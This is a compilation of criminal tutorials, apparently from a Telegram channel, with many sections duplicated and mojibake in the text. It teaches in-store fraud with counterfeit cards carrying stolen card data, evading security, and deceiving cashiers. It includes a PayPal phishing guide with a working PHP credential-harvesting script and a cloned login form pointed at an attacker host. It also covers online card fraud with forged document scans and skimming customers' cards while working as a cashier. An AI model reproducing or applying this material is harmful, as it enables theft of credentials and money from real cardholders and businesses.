π¦ Plastic cards to put dumps on: Okay again never use your own card to encode onto, just not the best idea. You can get cards from just about anywhere, some drugstores sell prepaid cc's, you can try that or get a Visa or MasterCard branded gift card. Most malls carry this type of GiftCard. Simon Cards have been used a lot in the past so I would suggest staying clear of those. The best way Buy from plastic vendor.
> Wallet-You will need extra wallet to store you novelty items. You don?t want to use your own wallet and keep having to take you real cards and id out and replacing them with your novelty.
> Anon Phone-Don't really need but if you have a phone merchant you can call from anon cell before going to use your card.
> You don't need everything I have but they all are helpful.
> Quick Start Up: Okay so you don?t have the time to wait to get all your tools or maybe your cash flow is not flowing. You may ponder how can I get up and going as quickly and cheaply as possible.
π¦Answer: You can buy dumps from reviewed vendor of course and buy plastic from plastic vendor. Most plastic vendors will encode your cards for you. This may be the cheapest way to go. Say you buy 5 dumps for $50.00 = $250.00 and 5 plastic for $75.00 =$375.00 total for both $625.00. Add a drop to that $50.00 and for $675.00 you will be ready to go. Another advantage with going this route is you will have matching plastic. The plastic vendor will emboss your plastic with your novelty information. If you don?t have a lot of funds try taking a cash advance on your own card. You will be able to repay it rather quickly.
1) Okay I finally got everything, I'm Ready to go Right?
2) Answer: Okay hang on there Skippy, you may think you are ready but are you??
3) Get into The Correct Frame Of Mind: Remember you are the Cardholder this is your card and you will treat it as such. Repeat 50 times then say back words 25 times, lol, Just kidding but you are who you say you are. This is your card don?t be scared this is your card. Who?s Your Card? Also a good idea to be aware of what your novelty id says. Know the address etc, this will help you feel more at ease and will help if cashier ask off the wall question. Be prepared go over in your mind how different scenes might play out and have good sensible answers.
4) Remember the customer is always right, Never let them think you?re not legit even if they throw it in your face.
π¦ Pick Your Poison! (Where should I shop)
If you are a Newbie you should try stores with self swipe checkouts. Just beware some of the self swipes will verify your id. Also if you want to get your feet wet grocery stores with self swipe are real nice. They even have the ones that you ring up your own shit and pay without any cashier present.
1) Gas Stations- I would suggest staying away from gas stations. Most have cameras and why risk someone getting your car info for such a small purchase. Plus some dumps will die quickly when using a Gas Station.
2) Using Cards with non-matching last 4- Simple shop at stores that do not check last 4 or use AVS or type in CW2 I?m not going to post which stores do and do not at this time. If you don?t know any off hand go there in person and use your legit card and watch what they do.
3) Cards with matching last 4- Shop anywhere that doesn?t have AVS or type in CW2 I will not list any stores you will have to do your own research.
> Wallet-You will need extra wallet to store you novelty items. You don?t want to use your own wallet and keep having to take you real cards and id out and replacing them with your novelty.
> Anon Phone-Don't really need but if you have a phone merchant you can call from anon cell before going to use your card.
> You don't need everything I have but they all are helpful.
> Quick Start Up: Okay so you don?t have the time to wait to get all your tools or maybe your cash flow is not flowing. You may ponder how can I get up and going as quickly and cheaply as possible.
π¦Answer: You can buy dumps from reviewed vendor of course and buy plastic from plastic vendor. Most plastic vendors will encode your cards for you. This may be the cheapest way to go. Say you buy 5 dumps for $50.00 = $250.00 and 5 plastic for $75.00 =$375.00 total for both $625.00. Add a drop to that $50.00 and for $675.00 you will be ready to go. Another advantage with going this route is you will have matching plastic. The plastic vendor will emboss your plastic with your novelty information. If you don?t have a lot of funds try taking a cash advance on your own card. You will be able to repay it rather quickly.
1) Okay I finally got everything, I'm Ready to go Right?
2) Answer: Okay hang on there Skippy, you may think you are ready but are you??
3) Get into The Correct Frame Of Mind: Remember you are the Cardholder this is your card and you will treat it as such. Repeat 50 times then say back words 25 times, lol, Just kidding but you are who you say you are. This is your card don?t be scared this is your card. Who?s Your Card? Also a good idea to be aware of what your novelty id says. Know the address etc, this will help you feel more at ease and will help if cashier ask off the wall question. Be prepared go over in your mind how different scenes might play out and have good sensible answers.
4) Remember the customer is always right, Never let them think you?re not legit even if they throw it in your face.
π¦ Pick Your Poison! (Where should I shop)
If you are a Newbie you should try stores with self swipe checkouts. Just beware some of the self swipes will verify your id. Also if you want to get your feet wet grocery stores with self swipe are real nice. They even have the ones that you ring up your own shit and pay without any cashier present.
1) Gas Stations- I would suggest staying away from gas stations. Most have cameras and why risk someone getting your car info for such a small purchase. Plus some dumps will die quickly when using a Gas Station.
2) Using Cards with non-matching last 4- Simple shop at stores that do not check last 4 or use AVS or type in CW2 I?m not going to post which stores do and do not at this time. If you don?t know any off hand go there in person and use your legit card and watch what they do.
3) Cards with matching last 4- Shop anywhere that doesn?t have AVS or type in CW2 I will not list any stores you will have to do your own research.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is AVS?
Address Verification System- verifies cardholders real addy, sometimes only uses zipcode.
Security- This is a very important topic, and here are some tips. First never park in front of store in which you are shopping. If someone gets suspicious of you they may write down your license plate or if they have cameras outside they may catch it on there cameras. Always park far enough away that the store cant see which car you got into. If possible park around a corner or have someone else drive and wait out of site for you. If you are using the buddy system You can get some 2 way radios or both keep cell phone on you and if shit hits the fan you can sprint away and have the car meet you somewhere nearby. Never run directly toward your car if shit hits the fan and you have the run, then security is probably running after you. See planning for more information on this. Also you may want to carry a small can of mace or pepper spray key chain size etc. This can be used to get your freedom from security but may lead to more charges if your caught.
Planning- Okay You are now just about ready to go.
1. What area will I be shopping at and what stores- Best to know in advance you can make driving directions to the area and from store to store. This is nice and will sped up the time your in one area. Helps you find the quickest way to and from area also. You don?t have to go this route you can go what I would call this free styling.
2. Once you spot your store find good parking spot away from camera out of view from store. Look around what will you do if shit goes wrong. A good rule of thumb is never run directly toward your car. You can park around the corner in next parking lot over. If shit hits fan you can exit store go in opposite direction and loop around behind the store to your car. Unless your 500 pounds and cant run in which if you try this method you may bet caught if you have to run.
3. Bring other Shirts with you. This is nice, you can change your shit when shopping at different stores this will help you keep much safer. And if your being chased you can take one off and have the other one underneath.
4. Most of the time you wont have any problems and you may tire of parking so far away, you tell yourself I?ve done this 100 times and no problems. But never let your guard or security down. This is what keeps you safe plus it?s good to walk a bit for heath reasons.
5. Keep them guessing, some people wear hats and sunglasses. My advice don?t wear sunglasses inside it only makes you look shady. A easy way to change your appearance is to use real glasses. If you don?t wear glasses use Stage glasses these look like regular lenses but are clear with no prescription. If you already wear glasses try different frames or use contact lenses. Also you can change your facial hair, grow a mustache or a goatee or beard. Then shave it off after sometime and go bareback etc. These are ideas to change your appearence.
6. Dress the part, dress to fit in, you don?t want people to remember you.
7. Always shop a good distance from where you live. You don?t want them to catch you on camera and put a picture of you on the news for your family or friends to see. Also you don?t want to go back to the same stores using your legit information. It?s unlikely they will catch you but you can never be too safe.
Okay I?m ready
π¦What is AVS?
Address Verification System- verifies cardholders real addy, sometimes only uses zipcode.
Security- This is a very important topic, and here are some tips. First never park in front of store in which you are shopping. If someone gets suspicious of you they may write down your license plate or if they have cameras outside they may catch it on there cameras. Always park far enough away that the store cant see which car you got into. If possible park around a corner or have someone else drive and wait out of site for you. If you are using the buddy system You can get some 2 way radios or both keep cell phone on you and if shit hits the fan you can sprint away and have the car meet you somewhere nearby. Never run directly toward your car if shit hits the fan and you have the run, then security is probably running after you. See planning for more information on this. Also you may want to carry a small can of mace or pepper spray key chain size etc. This can be used to get your freedom from security but may lead to more charges if your caught.
Planning- Okay You are now just about ready to go.
1. What area will I be shopping at and what stores- Best to know in advance you can make driving directions to the area and from store to store. This is nice and will sped up the time your in one area. Helps you find the quickest way to and from area also. You don?t have to go this route you can go what I would call this free styling.
2. Once you spot your store find good parking spot away from camera out of view from store. Look around what will you do if shit goes wrong. A good rule of thumb is never run directly toward your car. You can park around the corner in next parking lot over. If shit hits fan you can exit store go in opposite direction and loop around behind the store to your car. Unless your 500 pounds and cant run in which if you try this method you may bet caught if you have to run.
3. Bring other Shirts with you. This is nice, you can change your shit when shopping at different stores this will help you keep much safer. And if your being chased you can take one off and have the other one underneath.
4. Most of the time you wont have any problems and you may tire of parking so far away, you tell yourself I?ve done this 100 times and no problems. But never let your guard or security down. This is what keeps you safe plus it?s good to walk a bit for heath reasons.
5. Keep them guessing, some people wear hats and sunglasses. My advice don?t wear sunglasses inside it only makes you look shady. A easy way to change your appearance is to use real glasses. If you don?t wear glasses use Stage glasses these look like regular lenses but are clear with no prescription. If you already wear glasses try different frames or use contact lenses. Also you can change your facial hair, grow a mustache or a goatee or beard. Then shave it off after sometime and go bareback etc. These are ideas to change your appearence.
6. Dress the part, dress to fit in, you don?t want people to remember you.
7. Always shop a good distance from where you live. You don?t want them to catch you on camera and put a picture of you on the news for your family or friends to see. Also you don?t want to go back to the same stores using your legit information. It?s unlikely they will catch you but you can never be too safe.
Okay I?m ready
π¦ Okay you have your cards and dumps, you planned your op out and you have got your mind ready to go what?s next?
1) Shopping- Yeah let?s go, Remember this is your card. Be confident and act normal. Pick out your product proceed to cashier and check out. Choosing your cashier is vital and you will get rather good with this as you go from what I have heard. Usually younger females are the best. You want them to process you like everyone else. Make them feel they have no reason to ask for more information like id etc. If they ask for id show them , keep in your wallet and just hold it for the can see,
If they ask to see your card to compare signatures let them do it but keep
2) you hand held out till they give it back. Start small and grow slowly , take time to learn the ropes and it will pay off for you big time.
3) Also if you card is declined it?s a good idea to carry a backup with you. You can tell them you might have overdrawn your account or limit and tell them you will try another card. If your 2nd card is declined or you don?t have one. Tell them you will go to bank or go get your checkbook etc. If for some reason you get a pick up card tell them you wife or girlfriend lost her card and reported her?s lost and you forgot. 99% of the time they will say okay. You can then try another card or tell them you will be back with checkbook.
4) Call for authorization- if this happens tell them you in a hurry and don?t have the time to deal with that or tell them your card must be over the limit and you don?t want to purchase the item now. Act as a cardholder would act embarrassed. Whatever you do don?t go through with the call especially if they have your card in there hand.
π¦ What to stay away from- If you are new don?t try carding a laptop right away. Start small , I would suggest staying away from high fraud items IE laptops and electronics. Also stay away from high security stores i.e. BB and CC. And stay away from malls they have more security then you need to deal with in the beginning.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
1) Shopping- Yeah let?s go, Remember this is your card. Be confident and act normal. Pick out your product proceed to cashier and check out. Choosing your cashier is vital and you will get rather good with this as you go from what I have heard. Usually younger females are the best. You want them to process you like everyone else. Make them feel they have no reason to ask for more information like id etc. If they ask for id show them , keep in your wallet and just hold it for the can see,
If they ask to see your card to compare signatures let them do it but keep
2) you hand held out till they give it back. Start small and grow slowly , take time to learn the ropes and it will pay off for you big time.
3) Also if you card is declined it?s a good idea to carry a backup with you. You can tell them you might have overdrawn your account or limit and tell them you will try another card. If your 2nd card is declined or you don?t have one. Tell them you will go to bank or go get your checkbook etc. If for some reason you get a pick up card tell them you wife or girlfriend lost her card and reported her?s lost and you forgot. 99% of the time they will say okay. You can then try another card or tell them you will be back with checkbook.
4) Call for authorization- if this happens tell them you in a hurry and don?t have the time to deal with that or tell them your card must be over the limit and you don?t want to purchase the item now. Act as a cardholder would act embarrassed. Whatever you do don?t go through with the call especially if they have your card in there hand.
π¦ What to stay away from- If you are new don?t try carding a laptop right away. Start small , I would suggest staying away from high fraud items IE laptops and electronics. Also stay away from high security stores i.e. BB and CC. And stay away from malls they have more security then you need to deal with in the beginning.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Basic Phishing tutorial BY UNDERCODE :
T.me/UndercodeTesting
1) something very powerful in hacking phishing this is the one of the most illegal techniques in hacking.
!I'm not responsible for your actions I write this for education purpose only if you get in to trouble I'm not responsible!
Phishing is highly illegal so if you are new to hacking I will recommend first to do other stuff like RATing and keylogging then phishing.
When you are phishing you have to highly protect your self.
2) First you need to sing up in very secure hosting. That won't get you in trouble I can't recommend you but after short search on internet I found some.
π¦ Code:
cwahi - http://cwahi.com
110mb - http://110mb.com
Ripway - http://ripway.com
SuperFreeHost - http://superfreehost.info
Freehostia - http://freehostia.com
Freeweb7 - http://freeweb7.com
t35 - http://t35.com
Awardspace - http://awardspace.com
PHPNet - http://phpnet.us
Free Web Hosting Pro - http://freewebhostingpro.com
ProHosts - http://prohosts.org
FreeZoka - http://www.freezoka.com/
000webhost - http://000webhost.com/
AtSpace - http://atspace.com
π¦I can't assure that those hosting are secure and there aren't Federals ! Those are free hostings. I haven't found paid but I thing that they are more secure.
So when you have found hosting its time to create phishing pages.
Let's say you have target Paypal (I won't recommend to target it when you don't have experience ) you will need login from there to get them there are 2 ways.
1.To use tool called Phish Creator - http://www.youtube.com/watch?v=xoTHvHQsroA
I don't know is it backdoored or not.
For linux users - http://www.youtube.com/watch?v=C_lFkiOYy...re=related
2.To do it manually.
Ok go to Paypal login page(in our case if you are going to phish Facebooks go to Facebook login page) and save it.
Now you should create script that will record all variable write in the page I can't help you here.
kidding open editor(notepad for example) and write this script.
Code:
<?php
header("Location: paypal.com");
$handle = fopen("accs.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Paste this and edit where is needed then save this will save all accs to accs.txt.
Now you should link this page to the save you have save earlier.
Open saved login page with editor and find "action=" and change it with page you have
create(copy).
example
Code:
action="https://www.paypal.com/bg/cgi-bin/webscr?cmd=_login-submit&dispatch=5885d80a13c0db1f8e263663d3faee8d0b7e678a25d883d0bcf119ae9b66ba33"
will become
π¦Code:
action="https://www.your-hosting.com/your-file"
What you just did is to call your own script when the user submit its form using the action command in html, so now you have the password and the user is redirected to original page.
π¦You are ready now its time to start spreading your link .
I'm not the best in this section but I can help .
E-mail Spam - This is highly illegal too. But in our case we attack paypal so lets spoof the email to paypal admins and send email in which we say that there is update to the system and they need to enter their information again.
- Belive or not this is very effective way.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Basic Phishing tutorial BY UNDERCODE :
T.me/UndercodeTesting
1) something very powerful in hacking phishing this is the one of the most illegal techniques in hacking.
!I'm not responsible for your actions I write this for education purpose only if you get in to trouble I'm not responsible!
Phishing is highly illegal so if you are new to hacking I will recommend first to do other stuff like RATing and keylogging then phishing.
When you are phishing you have to highly protect your self.
2) First you need to sing up in very secure hosting. That won't get you in trouble I can't recommend you but after short search on internet I found some.
π¦ Code:
cwahi - http://cwahi.com
110mb - http://110mb.com
Ripway - http://ripway.com
SuperFreeHost - http://superfreehost.info
Freehostia - http://freehostia.com
Freeweb7 - http://freeweb7.com
t35 - http://t35.com
Awardspace - http://awardspace.com
PHPNet - http://phpnet.us
Free Web Hosting Pro - http://freewebhostingpro.com
ProHosts - http://prohosts.org
FreeZoka - http://www.freezoka.com/
000webhost - http://000webhost.com/
AtSpace - http://atspace.com
π¦I can't assure that those hosting are secure and there aren't Federals ! Those are free hostings. I haven't found paid but I thing that they are more secure.
So when you have found hosting its time to create phishing pages.
Let's say you have target Paypal (I won't recommend to target it when you don't have experience ) you will need login from there to get them there are 2 ways.
1.To use tool called Phish Creator - http://www.youtube.com/watch?v=xoTHvHQsroA
I don't know is it backdoored or not.
For linux users - http://www.youtube.com/watch?v=C_lFkiOYy...re=related
2.To do it manually.
Ok go to Paypal login page(in our case if you are going to phish Facebooks go to Facebook login page) and save it.
Now you should create script that will record all variable write in the page I can't help you here.
kidding open editor(notepad for example) and write this script.
Code:
<?php
header("Location: paypal.com");
$handle = fopen("accs.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Paste this and edit where is needed then save this will save all accs to accs.txt.
Now you should link this page to the save you have save earlier.
Open saved login page with editor and find "action=" and change it with page you have
create(copy).
example
Code:
action="https://www.paypal.com/bg/cgi-bin/webscr?cmd=_login-submit&dispatch=5885d80a13c0db1f8e263663d3faee8d0b7e678a25d883d0bcf119ae9b66ba33"
will become
π¦Code:
action="https://www.your-hosting.com/your-file"
What you just did is to call your own script when the user submit its form using the action command in html, so now you have the password and the user is redirected to original page.
π¦You are ready now its time to start spreading your link .
I'm not the best in this section but I can help .
E-mail Spam - This is highly illegal too. But in our case we attack paypal so lets spoof the email to paypal admins and send email in which we say that there is update to the system and they need to enter their information again.
- Belive or not this is very effective way.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Carding Tutorial#1 FULL
t.me/undercodeTESTING
Carding: Carding: Online, Instore, Going through vendors and advice, Phishing for change of billing addresses
Including drops and what you need to know;Huge guide written by me
Carding: Carding: Online, Instore, Going through vendors and advice, Phishing for change of billing addresses
Including drops and what you need to know;Huge guide written by me
kay major updates done to this carding yext, it will cover the basics of most carding knowledge. Going into absolutely everything would mean having to go onto ID theft and fake IDs which can be classed as 2 different categories of their own.
kay major updates done to this carding text, it will cover the basics of most carding knowledge. Going into absolutely everything would mean having to go onto ID theft and fake IDs which can be classed as 2 different categories of their own.
What I'm going to cover:
Online Carding
- A quick overview of what online carding is
- SOCKS and why we use them
- Finding a cardable site and what cardable means
- Carding "non cardable websites" with fake CC scans and other fake documents
Carding while on the job
- Getting CC, CVV, CVV2 through use of mobiles
- Skimming whilst on the job
- Using carbonless receipts to get details (pretty outdated method)
Trashing
- Trashing for receipts and credit reports (pretty outdated although still works)
Phishing over the phone
- Phishing over the phone for details
Keylogging for CVV2s
- Hardware keylogging
Carding Instore
- What instore carding is (very brief)
- How it's done
- How to act and present yourself instore
Carding over the phone
- Carding over the phone
IRC
- Services provided in IRC
- Advantages to using IRC for info
- Disadvantages
- How to find carding channels (Will not go too much into this as there are secrets between fellow carders which we like people interested enough to find out for themselves)
- Vendors and how to approach them
- How to rip in IRC (EVERY vendor, reliable or not has ripped some n00b who acted like they knew what they were doing)
::::WU BUG BULLSHIT and how to rip n00bs and gain more::::
Phishing for Change of billing
- What COB is and why it's useful
- Use through phishing pages
- Use through keylogging
Drops and what you need to know about them
- Drops and what you need to know about them
What carding is
Carding summed up quickly is the act of obtaining someone's credit card information, from the CC#, CVV, CVV2, CVN, and the billing address, along with the expiry date and name of the person the card belongs to along with a signature.
Online Carding
Online carding is the purchasing of goods done over the internet with the CVV2.
Now for you n00bies you're probably wondering what a CVV2 is, it's simply just the database of basic info for the card such as the card type (e.g. Mastercard) First and last name, address and post code, phone number of the card owner, the expiry date (and start date if it's a debit card or prepaid CC), the actual CC number and the CVC (card verification code, which is the 3 digits on the back of the card).
This is the format you usually get them in when you buy off IRC:
:::MC ::: Mr Nigerian Mugu ::: 1234567890123456 ::: 09|11 ::: 01/15 ::: 123 ::: 123 fake street, fakeville, ::: Fake City ::: DE24 TRH ::: 01234-567890 :::
SOCKS and why we use them
Now with ANY fraud at all you have to take precautions so you don't make it easy for anyone to catch you in your wrong doings. As usual I swear against TOR for carding/scammin because most nodes are blacklisted by websites and because TOR cycles through various different proxies; and even if you configure it to go straight through an exit node of your choice it's still not worth it. You can use JAP but make sure you're using some constant sock proxies from the same city, town or area that the card is from; also go wardriving and use a VPN (don't trust anyone off IRC with these, you'll have to do some searching around yourself for a highly trusted one and one which won't comply with LE).
π¦Carding Tutorial#1 FULL
t.me/undercodeTESTING
Carding: Carding: Online, Instore, Going through vendors and advice, Phishing for change of billing addresses
Including drops and what you need to know;Huge guide written by me
Carding: Carding: Online, Instore, Going through vendors and advice, Phishing for change of billing addresses
Including drops and what you need to know;Huge guide written by me
kay major updates done to this carding yext, it will cover the basics of most carding knowledge. Going into absolutely everything would mean having to go onto ID theft and fake IDs which can be classed as 2 different categories of their own.
kay major updates done to this carding text, it will cover the basics of most carding knowledge. Going into absolutely everything would mean having to go onto ID theft and fake IDs which can be classed as 2 different categories of their own.
What I'm going to cover:
Online Carding
- A quick overview of what online carding is
- SOCKS and why we use them
- Finding a cardable site and what cardable means
- Carding "non cardable websites" with fake CC scans and other fake documents
Carding while on the job
- Getting CC, CVV, CVV2 through use of mobiles
- Skimming whilst on the job
- Using carbonless receipts to get details (pretty outdated method)
Trashing
- Trashing for receipts and credit reports (pretty outdated although still works)
Phishing over the phone
- Phishing over the phone for details
Keylogging for CVV2s
- Hardware keylogging
Carding Instore
- What instore carding is (very brief)
- How it's done
- How to act and present yourself instore
Carding over the phone
- Carding over the phone
IRC
- Services provided in IRC
- Advantages to using IRC for info
- Disadvantages
- How to find carding channels (Will not go too much into this as there are secrets between fellow carders which we like people interested enough to find out for themselves)
- Vendors and how to approach them
- How to rip in IRC (EVERY vendor, reliable or not has ripped some n00b who acted like they knew what they were doing)
::::WU BUG BULLSHIT and how to rip n00bs and gain more::::
Phishing for Change of billing
- What COB is and why it's useful
- Use through phishing pages
- Use through keylogging
Drops and what you need to know about them
- Drops and what you need to know about them
What carding is
Carding summed up quickly is the act of obtaining someone's credit card information, from the CC#, CVV, CVV2, CVN, and the billing address, along with the expiry date and name of the person the card belongs to along with a signature.
Online Carding
Online carding is the purchasing of goods done over the internet with the CVV2.
Now for you n00bies you're probably wondering what a CVV2 is, it's simply just the database of basic info for the card such as the card type (e.g. Mastercard) First and last name, address and post code, phone number of the card owner, the expiry date (and start date if it's a debit card or prepaid CC), the actual CC number and the CVC (card verification code, which is the 3 digits on the back of the card).
This is the format you usually get them in when you buy off IRC:
:::MC ::: Mr Nigerian Mugu ::: 1234567890123456 ::: 09|11 ::: 01/15 ::: 123 ::: 123 fake street, fakeville, ::: Fake City ::: DE24 TRH ::: 01234-567890 :::
SOCKS and why we use them
Now with ANY fraud at all you have to take precautions so you don't make it easy for anyone to catch you in your wrong doings. As usual I swear against TOR for carding/scammin because most nodes are blacklisted by websites and because TOR cycles through various different proxies; and even if you configure it to go straight through an exit node of your choice it's still not worth it. You can use JAP but make sure you're using some constant sock proxies from the same city, town or area that the card is from; also go wardriving and use a VPN (don't trust anyone off IRC with these, you'll have to do some searching around yourself for a highly trusted one and one which won't comply with LE).
You can get good SOCKS from anyproxy.net (people are selling accounts for the site in IRC all the time), that's the best place but even I ended up losing the account eventually (unknowingly I was sharing it with some Nigerian dude who became selfish).
So we use SOCKS because they stay constant. But don't let that get your guard down, you want FRESH proxies everytime you card.
Finding a cardable site and what cardable means
Basically a cardable site holds these characteristics and what you should be looking for to determine an easily "cardable" website:
- The top one you need to look for on the site's TOS is that they send to any address and not just the one registered on the card (although you can easily get around this if they don't, with a COB, photoshopped verification (will go into detail later) or some social engineering over the phone).
- The next important to look for is if they have a visa verification code or mastercard secure code (most of the time if you ask your vendor they'll include them in your CVV2 details textfile), if they do have one of these you have to put in and you don't have them then don't waste your time
- If they ship internationally (for obvious reasons, but you can just stick to local websites and order to your local drop)
- If they leave packages at the door when no one's in, or around the back in a safe area (I know of one site in the UK that has all these qualities including this one, it is perfect for carding clothes)
- Also you can't forget to see what other security checks they need to do (if they need to call you up to verify or want a utility bill, passport or a scan of the actual CC)
It is hard to find websites online now that have most of these qualities, therefore we have to use COBs and photoshop to help us along the way, which is what I'll go into now.
Carding "non cardable websites" with fake CC scans and other fake documents
Okay so say you come across a site that will deliver to another house not registered on the card, but they want verificaton either through phone or scans of a utility bill, credit card or passport.
For this you'll want to get a pay as you go deal for a cheap shitty mobile all in fake details (say a nokia 3210, brick LMAO!), or you can use spoofcard.com to your advantage to help you. Hell if the person's details you're using is local to you and you're daring then go to their home and beige box from there; it'd be very convincing.
If they speak to you over the phone have all details in your mind about the item you're carding, have some bullshit story if you're having it sent to a diff address such as a family member's birthday and you need it there as quick as possible as it's a last minute thing, or some shit like that. If you're carding multiple sites at the same time it's easy to get them mixed up, so make sure who it is calling you 1st.
For CC scans and how to do them check the attachments at the end of this file, they explain so much better than I could. How you use them is once you've made them like the tuts have said to do, you then tilt them a little bit so it does actually look like a scan. To make it even more believable put some paper in the scanner (dark shade if you must), scan it and open in photoshop and then put the shopped CC scan of the front onto it and then do the same with the back, then send the scans to them via e-mail or post. Same goes for utility bills (can be got through trashing or your own, and then edited in PS).
Do not use the same designs when making your CC scans, otherwise it will become too obvious. To give you a head start on mastercards (what I recommend for n00bs to go for) I'm giving you a globe hologram image so you won't have to buy them in IRC; unfortunately all of my visa hologram pics are shit, but I'm working on getting a good one soon.
VISA hologram pic coming soon!
So we use SOCKS because they stay constant. But don't let that get your guard down, you want FRESH proxies everytime you card.
Finding a cardable site and what cardable means
Basically a cardable site holds these characteristics and what you should be looking for to determine an easily "cardable" website:
- The top one you need to look for on the site's TOS is that they send to any address and not just the one registered on the card (although you can easily get around this if they don't, with a COB, photoshopped verification (will go into detail later) or some social engineering over the phone).
- The next important to look for is if they have a visa verification code or mastercard secure code (most of the time if you ask your vendor they'll include them in your CVV2 details textfile), if they do have one of these you have to put in and you don't have them then don't waste your time
- If they ship internationally (for obvious reasons, but you can just stick to local websites and order to your local drop)
- If they leave packages at the door when no one's in, or around the back in a safe area (I know of one site in the UK that has all these qualities including this one, it is perfect for carding clothes)
- Also you can't forget to see what other security checks they need to do (if they need to call you up to verify or want a utility bill, passport or a scan of the actual CC)
It is hard to find websites online now that have most of these qualities, therefore we have to use COBs and photoshop to help us along the way, which is what I'll go into now.
Carding "non cardable websites" with fake CC scans and other fake documents
Okay so say you come across a site that will deliver to another house not registered on the card, but they want verificaton either through phone or scans of a utility bill, credit card or passport.
For this you'll want to get a pay as you go deal for a cheap shitty mobile all in fake details (say a nokia 3210, brick LMAO!), or you can use spoofcard.com to your advantage to help you. Hell if the person's details you're using is local to you and you're daring then go to their home and beige box from there; it'd be very convincing.
If they speak to you over the phone have all details in your mind about the item you're carding, have some bullshit story if you're having it sent to a diff address such as a family member's birthday and you need it there as quick as possible as it's a last minute thing, or some shit like that. If you're carding multiple sites at the same time it's easy to get them mixed up, so make sure who it is calling you 1st.
For CC scans and how to do them check the attachments at the end of this file, they explain so much better than I could. How you use them is once you've made them like the tuts have said to do, you then tilt them a little bit so it does actually look like a scan. To make it even more believable put some paper in the scanner (dark shade if you must), scan it and open in photoshop and then put the shopped CC scan of the front onto it and then do the same with the back, then send the scans to them via e-mail or post. Same goes for utility bills (can be got through trashing or your own, and then edited in PS).
Do not use the same designs when making your CC scans, otherwise it will become too obvious. To give you a head start on mastercards (what I recommend for n00bs to go for) I'm giving you a globe hologram image so you won't have to buy them in IRC; unfortunately all of my visa hologram pics are shit, but I'm working on getting a good one soon.
VISA hologram pic coming soon!
Carding whilst on the job
Getting CC, CVV, CVV2 through use of mobiles
Believe it or not giving your information out to anyone anywhere is not a wise choice, you can not trust anyone in this day and age. Yes there are carders working on the inside in places where there are a lot of people around flashing off their plastic cash and using them freely without a care in the world. The most common of places for a carder to work at are brand label clothing stores such as Limey's, Charlie Brown's and all the other trendy shops.
Ever noticed when yourself or someone else has paid at the desk with a debit card or credit card that they bring out a keypad from under the desk, then put your card into it and have the buyer input the pin? Think again when they take your credit card and go under the desk with it to get the keypad, they are doing more than just that; just because they're not taking the card and running off with it does not mean they're not stealing your information. A friend of my dad used to card and work in a clothing store, he used to have a piece of play doh stuck under the desk and he used to press the card onto the piece of play doh, unfortunately he began doing it too much and because he'd gotten away with it so many times he became careless and got caught out by a co worker and from what I know he is still doing time. The moral is, be careful with the play doh method. The unfortunate thing is you can only get the full info of 2 cards at the max, and you don't know exactly if you're pressing over the info of another card already put on to the play doh. Also you can't get the CVC through this method, I was just giving a classic example from the olden days.
But there is a new wonderful invention called cameras, video recording, and mobile phones and they are even all working on the same thing. It's best to test it out 1st and have a camera on your phone that is at least over 2 megapixel and allows long enough video recording times. The phone is set to video record and on a lighting if needed, and taped underneath the desk for you to record both sides of the card for all the information you need, as well as being quick you can get a lot more than 2 on, depending on how long each recording lasts, you may need to start more than one recording.
You need good reason to be going under the desk to get the chip and pin machine, so make the desk look cluttered up and put shit in the way of everything, such as coat hangers and various other items; or you could just flat out bullshit the customer and say that the chip and pin machine on the desk isn't working so you need to get the other one, take their card and then go under searching the desk and quickly show it to the camera phone and then get the chip and pin machine and put the card in it and then hand to the customer to put in their pin as normal, unaware you have a CVV2 to later use when shopping online.
Skimming whilst on the job
For skimming you'll want a mini portable MSR500M reader that can be fitted on your waistline belt or of course once again under the desk, if you're a cashier. But you'll also want a MSR206 writer if you plan on writing the tracks to an embossed CR-80 piece of plastic later (you can make these yourself but embossers are expensive and it's an expensive procedure, so wait a while until you do that yourself and buy them from IRC (be careful, people like to rip with plastics, or you'll get shit quality if you don't watch out).
Getting CC, CVV, CVV2 through use of mobiles
Believe it or not giving your information out to anyone anywhere is not a wise choice, you can not trust anyone in this day and age. Yes there are carders working on the inside in places where there are a lot of people around flashing off their plastic cash and using them freely without a care in the world. The most common of places for a carder to work at are brand label clothing stores such as Limey's, Charlie Brown's and all the other trendy shops.
Ever noticed when yourself or someone else has paid at the desk with a debit card or credit card that they bring out a keypad from under the desk, then put your card into it and have the buyer input the pin? Think again when they take your credit card and go under the desk with it to get the keypad, they are doing more than just that; just because they're not taking the card and running off with it does not mean they're not stealing your information. A friend of my dad used to card and work in a clothing store, he used to have a piece of play doh stuck under the desk and he used to press the card onto the piece of play doh, unfortunately he began doing it too much and because he'd gotten away with it so many times he became careless and got caught out by a co worker and from what I know he is still doing time. The moral is, be careful with the play doh method. The unfortunate thing is you can only get the full info of 2 cards at the max, and you don't know exactly if you're pressing over the info of another card already put on to the play doh. Also you can't get the CVC through this method, I was just giving a classic example from the olden days.
But there is a new wonderful invention called cameras, video recording, and mobile phones and they are even all working on the same thing. It's best to test it out 1st and have a camera on your phone that is at least over 2 megapixel and allows long enough video recording times. The phone is set to video record and on a lighting if needed, and taped underneath the desk for you to record both sides of the card for all the information you need, as well as being quick you can get a lot more than 2 on, depending on how long each recording lasts, you may need to start more than one recording.
You need good reason to be going under the desk to get the chip and pin machine, so make the desk look cluttered up and put shit in the way of everything, such as coat hangers and various other items; or you could just flat out bullshit the customer and say that the chip and pin machine on the desk isn't working so you need to get the other one, take their card and then go under searching the desk and quickly show it to the camera phone and then get the chip and pin machine and put the card in it and then hand to the customer to put in their pin as normal, unaware you have a CVV2 to later use when shopping online.
Skimming whilst on the job
